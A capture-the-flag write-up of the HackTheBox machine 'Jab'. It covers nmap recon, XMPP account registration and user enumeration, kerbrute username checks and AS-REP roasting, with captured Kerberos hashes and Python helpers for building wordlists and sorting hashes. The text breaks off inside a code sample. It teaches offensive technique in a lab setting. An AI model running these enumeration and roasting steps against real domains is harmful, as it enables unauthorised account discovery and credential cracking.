
HackTheBox - Jab

In Jab we accessed a Jabber (XMPP) server with Pidgin and obtained the list of registered users. We then ran AS-REP Roasting against that list and cracked one of the three hashes we got back. With a valid pair of credentials we joined a private chat room containing credentials that gave us DCOM access and then a shell on the machine. Finally we escalated privileges through a management plugin uploaded to Openfire, which let us run commands as SYSTEM on the machine.

Name: Jab
OS: Windows
Points: 30
Difficulty: Medium
Release date: 2024-02-24
IP: 10.10.11.4
Maker: mrb3n

User Rated Difficulty (votes): Cake 87, VeryEasy 82, Easy 347, TooEasy 587, Medium 1034, BitHard 636, Hard 429, TooHard 106, ExHard 34, BrainFuck 55.

Recon

nmap

nmap shows the profile of a domain controller: DNS (53), Kerberos (88), RPC (135, 593), SMB (139, 445), LDAP and LDAPS (389, 636, 3268, 3269), WinRM (5985) and ADWS (9389). On top of that there is a full set of XMPP ports (5222/5223 for clients, 5269/5270 for server-to-server, 5262/5263 and 5275/5276 for Openfire connection managers and external components), Openfire's HTTP binding (BOSH) service on 7070/7443, and its file-transfer proxy on 7777, which nmap fingerprints as SOCKS5. The LDAP certificate names the host DC01.jab.htb, the domain is jab.htb, and the clock skew is about 2 minutes, which matters for Kerberos later.

# Nmap 7.94SVN scan initiated Mon Mar 18 16:41:34 2024 as: nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49681,49776,58624 -sV -sC -oN nmap_scan 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.060s latency).

PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-03-18 20:43:54Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-18T20:45:11+00:00; +2m10s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-03-18T20:45:10+00:00; +2m10s from scanner time.
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-03-18T20:45:10+00:00; +2m10s from scanner time.
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-03-18T20:45:10+00:00; +2m11s from scanner time.
5222/tcp  open  jabber
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     auth_mechanisms:
|     errors:
|       invalid-namespace
|       (timeout)
|     unknown:
|     capabilities:
|     xmpp:
|       version: 1.0
|_    stream_id: 5v4iv5dqbg
5223/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5262/tcp  open  jabber
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     auth_mechanisms:
|     errors:
|       invalid-namespace
|       (timeout)
|     unknown:
|     capabilities:
|     xmpp:
|       version: 1.0
|_    stream_id: 8fk9enuneq
5263/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
|_ssl-date: TLS randomness does not represent time
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5275/tcp  open  jabber
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     auth_mechanisms:
|     errors:
|       invalid-namespace
|       (timeout)
|     unknown:
|     capabilities:
|     xmpp:
|       version: 1.0
|_    stream_id: 7m2594nnh2
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5276/tcp  open  ssl/jabber
|_ssl-date: TLS randomness does not represent time
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  realserver?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:43:53 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:43:59 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq:
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open  ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:44:06 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:44:14 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq:
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7777/tcp  open  socks5              (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49671/tcp open  msrpc               Microsoft Windows RPC
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49681/tcp open  msrpc               Microsoft Windows RPC
49776/tcp open  msrpc               Microsoft Windows RPC
58624/tcp open  msrpc               Microsoft Windows RPC
8 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[...]
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-03-18T20:45:01
|_  start_date: N/A
|_clock-skew: mean: 2m10s, deviation: 0s, median: 2m09s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 18 16:43:04 2024 -- 1 IP address (1 host up) scanned in 89.26 seconds

# Nmap 7.94SVN scan initiated Mon Mar 18 16:44:12 2024 as: nmap -sU --min-rate 10000 -oN nmap_scan_udp 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.065s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT    STATE  SERVICE
3/udp   closed compressnet
53/udp  open   domain
88/udp  open   kerberos-sec
123/udp open   ntp

# Nmap done at Mon Mar 18 16:44:13 2024 -- 1 IP address (1 host up) scanned in 1.04 seconds

SMB & RPC

Null sessions against SMB and RPC give us nothing: the anonymous share listing comes back empty, and rpcclient's enumdomusers and enumdomgroups return NT_STATUS_ACCESS_DENIED.

 π ~/htb/jab ❯ smbclient -L 10.10.11.4 -N
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
 π ~/htb/jab ❯ rpcclient -U "" -N 10.10.11.4
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
 π ~/htb/jab ❯

OpenFire

Ports 7070 and 7443 serve a page that links to the XMPP HTTP binding documentation (BOSH, XEP-0124) and whose title says Openfire. According to Wikipedia:

Openfire is an instant messaging system, written in Java, that uses the XMPP protocol, …

So we assume Openfire is running; however port 9090, where its administration console normally listens, is not reachable from the outside.

Jabber (XMPP)

nmap lists several ports that answer with Jabber stream errors. XMPP (Jabber) is an instant-messaging protocol, and its extensions (XEPs) expose functionality that can leak information to an unauthenticated or low-privileged client, such as in-band registration (XEP-0077) and user search (XEP-0055).

Registration

One of these extensions is in-band registration (XEP-0077). Open registration should itself be treated as a misconfiguration: anyone can create an account on the server and from there use its features and services.

Following an exploit.im post on registering XMPP users, we registered an account with Pidgin.

In Pidgin go to Accounts > Manage > Add, fill in the required values and tick the option to create a new account on the server.

Under the advanced options set the server to connect to and, if available, select the SSL/TLS option.

Click Accept; a new window pops up to finish the registration. Fill it in, click OK, and the registration is complete.
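The same exchange without the GUI, as an added example that is not part of the original writeup: it builds the two stanzas a client sends for XEP-0077 in-band registration and classifies the server's reply, so you can tell "registration disabled" apart from "username already exists" (which confirms a valid account). In a live session these stanzas travel inside the XML stream opened on 5222 after STARTTLS; here everything is offline. The server replies, the stanza ids and the username sckull are constructed placeholders.

```python
"""XEP-0077 in-band registration, client side, offline (added example)."""
import xml.etree.ElementTree as ET

NS_REGISTER = "jabber:iq:register"
NS_STANZAS = "urn:ietf:params:xml:ns:xmpp-stanzas"


def build_register_get(stanza_id, server):
    """Step 1: ask the server which registration fields it requires."""
    iq = ET.Element("iq", type="get", id=stanza_id, to=server)
    ET.SubElement(iq, "query", xmlns=NS_REGISTER)
    return ET.tostring(iq, encoding="unicode")


def build_register_set(stanza_id, server, username, password):
    """Step 2: submit username/password using the legacy (non data-form) fields."""
    iq = ET.Element("iq", type="set", id=stanza_id, to=server)
    query = ET.SubElement(iq, "query", xmlns=NS_REGISTER)
    ET.SubElement(query, "username").text = username
    ET.SubElement(query, "password").text = password
    return ET.tostring(iq, encoding="unicode")


def classify_register_reply(xml_text):
    """Map the server's <iq> reply to an outcome the tester cares about.

    Stanzas copied out of a client console carry no jabber:client namespace,
    so <iq> and <error> are matched without one; the error *condition* is a
    namespaced child of <error>, and the optional <text/> is ignored.
    """
    iq = ET.fromstring(xml_text.strip())
    if iq.tag != "iq":
        raise ValueError("not an <iq> stanza")
    if iq.get("type") == "result":
        return "registered"
    if iq.get("type") != "error":
        raise ValueError("unexpected iq type %r" % iq.get("type"))
    error = iq.find("error")
    conditions = set()
    if error is not None:
        conditions = {c.tag.rsplit("}", 1)[-1] for c in error} - {"text"}
    if "conflict" in conditions:
        return "username-taken"        # the account exists: a valid user
    if conditions & {"not-allowed", "forbidden", "service-unavailable"}:
        return "registration-disabled"
    if "not-acceptable" in conditions:
        return "fields-rejected"       # missing field or password policy
    return "error:" + ",".join(sorted(conditions))


# Constructed server replies for the three outcomes worth distinguishing.
SAMPLE_REPLIES = {
    "ok": "<iq type='result' id='reg2' from='jab.htb'/>",
    "taken": (
        "<iq type='error' id='reg2' from='jab.htb'>"
        "<query xmlns='jabber:iq:register'><username>sckull</username></query>"
        "<error type='cancel'><conflict xmlns='%s'/></error></iq>" % NS_STANZAS
    ),
    "disabled": (
        "<iq type='error' id='reg2' from='jab.htb'>"
        "<error type='cancel'><not-allowed xmlns='%s'/></error></iq>" % NS_STANZAS
    ),
}

if __name__ == "__main__":
    print(build_register_get("reg1", "jab.htb"))
    print(build_register_set("reg2", "jab.htb", "sckull", "S3cr3t!"))
    for name, reply in SAMPLE_REPLIES.items():
        print(name, "->", classify_register_reply(reply))
```

A `conflict` reply is the interesting one from an attacker's point of view: even when you cannot register, it tells you the username exists, which is the same oracle the user search below gives you in bulk.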

Room - Chats

Pidgin can list the server's chat rooms under Join a Chat > Room List; we see two: test and test2.

We have no access or permissions on the first.

In the second only the user bdavis is visible, posting what looks like a base64-encoded image.

Decoding the "image" yields nothing but a sentence.

 π ~/htb/jab ❯ echo VGhlIGltYWdlIGRhdGEgZ29lcyBoZXJlCg== | base64 -d
The image data goes here
 π ~/htb/jab ❯

Users

We find that users can be enumerated through the server's search service (search.jab.htb): a long list with email, username, name and JID. The Pidgin dialog, however, does not let us copy all of it.

XMPP Console - Plugin

We install the XMPP plugins XMPP Service Discovery and XMPP Console.

Under Tools > XMPP Console a new window shows the traffic exchanged with the server.

We run the user search again and this time get the list as the raw XML stanza.

From that we build a wordlist of usernames. Note that the first grep hit is the `<iq ... to='sckull@...'>` wrapper line, i.e. our own JID, which we remove by hand in the nano step below.

 π ~/htb/jab ❯ cat users.xml| grep jab.htb | cut -d "@" -f1 | cut -d '>' -f2 | uniq | wc -l
2685
 π ~/htb/jab ❯ cat users.xml| grep jab.htb | cut -d "@" -f1 | cut -d '>' -f2 | uniq > users_uniq.txt
 π ~/htb/jab ❯ head users_uniq.txt
<iq type='result' id='purpleaba15e6a' from='search.jab.htb' to='sckull
lmccarty
nenglert
aslater
rtruelove
pwoodland
pparodi
mhernandez
atorres
apugh
 π ~/htb/jab ❯ nano users_uniq.txt
 π ~/htb/jab ❯ wc -l users_uniq.txt
2684 users_uniq.txt
 π ~/htb/jab ❯
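A parser for that stanza, as an added example rather than code from the writeup: the search result is a XEP-0004 data form inside a `jabber:iq:search` query, where `<reported>` declares the columns and each `<item>` is one user. Reading the `Username` field per item (falling back to the local part of the JID, restricted to the expected domain) avoids the grep/cut fragility above: the `to=` attribute of the `<iq>` wrapper can never leak into the wordlist and duplicates are dropped. The sample XML is constructed to match that shape; only the usernames come from the writeup, the display names are made up.

```python
"""Turn a jabber:iq:search (XEP-0055) result into a username wordlist (added example)."""
import xml.etree.ElementTree as ET

NS_DATA = "{jabber:x:data}"

# Constructed sample in the shape the Pidgin XMPP console shows; the third
# <item> is a deliberate duplicate to exercise de-duplication.
SAMPLE_RESULT = """
<iq type='result' id='purpleaba15e6a' from='search.jab.htb' to='sckull@jab.htb/pidgin'>
  <query xmlns='jabber:iq:search'>
    <x xmlns='jabber:x:data' type='result'>
      <reported>
        <field var='jid' label='JID' type='text-single'/>
        <field var='Username' label='Username' type='text-single'/>
        <field var='Name' label='Name' type='text-single'/>
        <field var='Email' label='Email' type='text-single'/>
      </reported>
      <item>
        <field var='jid'><value>lmccarty@jab.htb</value></field>
        <field var='Username'><value>lmccarty</value></field>
        <field var='Name'><value>L. McCarty</value></field>
        <field var='Email'><value>lmccarty@jab.htb</value></field>
      </item>
      <item>
        <field var='jid'><value>nenglert@jab.htb</value></field>
        <field var='Username'><value>nenglert</value></field>
        <field var='Name'><value>N. Englert</value></field>
        <field var='Email'><value>nenglert@jab.htb</value></field>
      </item>
      <item>
        <field var='jid'><value>lmccarty@jab.htb</value></field>
        <field var='Username'><value>lmccarty</value></field>
        <field var='Name'><value>L. McCarty</value></field>
        <field var='Email'><value>lmccarty@jab.htb</value></field>
      </item>
      <item>
        <field var='jid'><value>aslater@jab.htb</value></field>
        <field var='Username'><value>aslater</value></field>
        <field var='Name'><value>A. Slater</value></field>
        <field var='Email'><value>aslater@jab.htb</value></field>
      </item>
    </x>
  </query>
</iq>
"""


def search_result_rows(xml_text):
    """Yield one {column: value} dict per <item> of the result form."""
    root = ET.fromstring(xml_text.strip())
    form = root.find(".//%sx" % NS_DATA)
    if form is None:
        raise ValueError("no jabber:x:data form in search result")
    for item in form.findall(NS_DATA + "item"):
        row = {}
        for field in item.findall(NS_DATA + "field"):
            value = field.find(NS_DATA + "value")
            row[field.get("var")] = value.text if value is not None else ""
        yield row


def usernames_from_search(xml_text, domain="jab.htb"):
    """Unique usernames in first-seen order, ready to feed to kerbrute.

    Prefer the Username column; otherwise take the local part of the JID,
    but only for JIDs in the target domain, so foreign or malformed rows
    (and anything that is not an <item>) never end up in the wordlist.
    """
    seen = []
    for row in search_result_rows(xml_text):
        name = (row.get("Username") or "").strip()
        if not name:
            local, _, host = row.get("jid", "").partition("@")
            if host.lower() != domain.lower():
                continue
            name = local.strip()
        if name and name not in seen:
            seen.append(name)
    return seen


if __name__ == "__main__":
    print("\n".join(usernames_from_search(SAMPLE_RESULT)))
```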

jmontgomery - XMPP

Check Users

We use kerbrute to check which of these usernames exist in the domain: 2681 of the 2684 are valid.

 π ~/htb/jab ❯ ./kerbrute userenum -d jab.htb --dc 10.10.11.4 users_uniq.txt -o output_kerbrute.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/18/24 - Ronnie Flathers @ropnop

2024/03/18 18:03:23 >  Using KDC(s):
2024/03/18 18:03:23 >  	10.10.11.4:88

2024/03/18 18:03:23 >  [+] VALID USERNAME:	 lmccarty@jab.htb
[..snip..]
2024/03/18 18:04:28 >  Done! Tested 2684 usernames (2681 valid) in 17.073 seconds
 π ~/htb/jab ❯ 

We build a new wordlist from kerbrute's output, removing the blank lines and the final summary line.

 π ~/htb/jab ❯ cat output_kerbrute.txt |cut -d ' ' -f8 | cut -d @ -f1 > users_ker.txt
 π ~/htb/jab ❯ nano users_ker.txt
 π ~/htb/jab ❯ wc -l users_ker.txt
2681 users_ker.txt
 π ~/htb/jab ❯

ASREPRoast

We try AS-REP Roasting with the list of valid users and get three hashes back, i.e. three accounts with "Do not require Kerberos preauthentication" set. We then run it again writing the hashes in hashcat format to a file (the command used is shown commented out at the end).

 π ~/htb/jab ❯ impacket-GetNPUsers -no-pass -usersfile users_ker.txt jab.htb/ | grep -v UF_DONT_REQUIRE_PREAUTH
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$jmontgomery@JAB.HTB:16a00405a61553a59f87ff6ef1824cbc$33a1c96483c8180056458bdbe966f6d163b047ee40d813a61002593d7978e42dbda18636836a712c80a3948540a2180c2797c80734238c1fa023aa7e3e8ce23d2f468b8e2e6fc37d933747730f826e6fd69136f23cdf84070ec668d2303272aca66c639e41bcb420e4601e6965e4c6c182571c3a0bbfe7991ac89c23a3fc1344b83448770ec87acd4cba4b6ac9f36e6ae1e8a5d14b2b4f4df78f05b6f03cdae569b2461d59e1367be9ec402a8f54a233665a7d0d4d015c6de8dad165a51da14057f95a39034457c4303a4cea3095279650090a654d6dc16e7150273333dfc046258c
$krb5asrep$23$lbradford@JAB.HTB:2eab39ca95d1aa219363a3bc7dc3f8bd$e6790efcab72b924f59bcea691a8798bbbef35df56b668be32e44df2d8aefe568c1b788ff347ee997c76bbc0baf3c7ca383d3421d6af77f4433319fba94bda9caa953d5b5b2a3b03e3bcea2f04f5f7255a4561f04244e5dbec0a8c4c8f37693396663c652aa488fd9d916070323a79d6dff89a874d03ea2c91bf2b89bf1326d3da33db37d2ee9b62dbe483a857d6ce6486e52c332ae86e117d5d671455dec05ec0cdde1d32bef63afc2749bccf76b75affa568b8d5ae970562758284f2627a6743b5b7f9e450b6167cb9f3ff3e76083f165b2a669b22a38a0883276f02a126a9409b
$krb5asrep$23$mlowe@JAB.HTB:711ebac5068383cb260b0f4a2def7d54$badbe73c29cccbf86b0bf5d3485d58022ea0df1409b0ebe25d993cf66fce0507682c2b74eb7ca1383ff3d206b540b79c84b79db62ab740571382d6306ed05bae4378cb294ce23f0aa2f70b3629e3ff32378cedb2c1d43718abc80ad8bfca1f1d69e09f0974a7a87892e46f076e8b5385cbeec49be1915d582de1f204b8e646ec52807e999e18c00daafba2e81efc27f029405e2a250bb8292f5323c6b319f52af3bdff0324179c10f032679a90ec9b791f8382feb49f5e0ec53c8154a1e830dbe02b57981ecf8fab3f35497e99ddccabae49796f04e1927d72b68eb3dd109376f326
 π ~/htb/jab ❯
#  impacket-GetNPUsers -no-pass -usersfile users_uniq.txt -format hashcat -outputfile hashes.asreproast jab.htb/ | grep -v "UF_DONT_REQUIRE_PREAUTH"
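A small triage helper, added here and not part of the writeup: john recognised all three AS-REP hashes on its own, but hashcat needs one mode per file, and a mixed dump (AS-REP hashes from GetNPUsers.py, TGS hashes from GetUserSPNs.py like the one pasted in the chat later, status lines in between) is easy to get wrong. The regexes below cover impacket's hashcat-format output for etype 23 (RC4-HMAC) only, mapping `$krb5asrep$23$` to mode 18200 and `$krb5tgs$23$` to 13100; anything else beginning with `$krb5` is flagged rather than dropped. The sample lines are constructed with shortened hex blobs; the usernames are the ones from this box.

```python
"""Sort Kerberos roasting output into per-hashcat-mode buckets (added example)."""
import re
from collections import defaultdict

# impacket "-format hashcat" layouts for etype 23 (RC4-HMAC):
#   $krb5asrep$23$user@REALM:<16-byte checksum hex>$<edata2 hex>
#   $krb5tgs$23$*user$REALM$spn*$<16-byte checksum hex>$<edata2 hex>
ASREP_RC4 = re.compile(
    r"^\$krb5asrep\$23\$(?P<user>[^@$:]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata2>[0-9a-f]+)$")
TGS_RC4 = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata2>[0-9a-f]+)$")
ETYPE_PREFIX = re.compile(r"^\$krb5(?P<kind>asrep|tgs)\$(?P<etype>\d+)\$")

HASHCAT_MODE = {"asrep": 18200, "tgs": 13100}  # RC4 AS-REP / RC4 TGS-REP


def parse_kerberos_hash(line):
    """Describe one line: a dict for a hash, None for a non-hash line."""
    line = line.strip()
    for kind, pattern in (("asrep", ASREP_RC4), ("tgs", TGS_RC4)):
        m = pattern.match(line)
        if m:
            d = m.groupdict()
            d.update(kind=kind, etype=23, mode=HASHCAT_MODE[kind], line=line)
            return d
    m = ETYPE_PREFIX.match(line)
    if m:
        # AES (etype 17/18) hashes use another layout and other hashcat modes;
        # report them instead of silently losing crackable material.
        return {"kind": "unsupported", "etype": int(m["etype"]), "line": line}
    return None


def triage(lines):
    """Group hash lines by hashcat mode; unknown layouts go under 'unsupported'."""
    groups = defaultdict(list)
    for line in lines:
        h = parse_kerberos_hash(line)
        if h is None:
            continue
        key = h["mode"] if h["kind"] != "unsupported" else "unsupported"
        groups[key].append(h["line"])
    return dict(groups)


def write_by_mode(groups, prefix="hashes"):
    """Write hashes.<mode> files, one per hashcat mode, and return their names."""
    written = []
    for key, lines in groups.items():
        path = "%s.%s" % (prefix, key)
        with open(path, "w") as fh:
            fh.write("\n".join(lines) + "\n")
        written.append(path)
    return written


# Constructed stand-in for tool output: hex blobs truncated, last line is a
# made-up AES-shaped entry only meant to hit the 'unsupported' path.
SAMPLE_OUTPUT = """\
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User lmccarty doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jmontgomery@JAB.HTB:16a00405a61553a59f87ff6ef1824cbc$33a1c96483c8180056458bdbe966f6d1
[-] User nenglert doesn't have UF_DONT_REQUIRE_PREAUTH set
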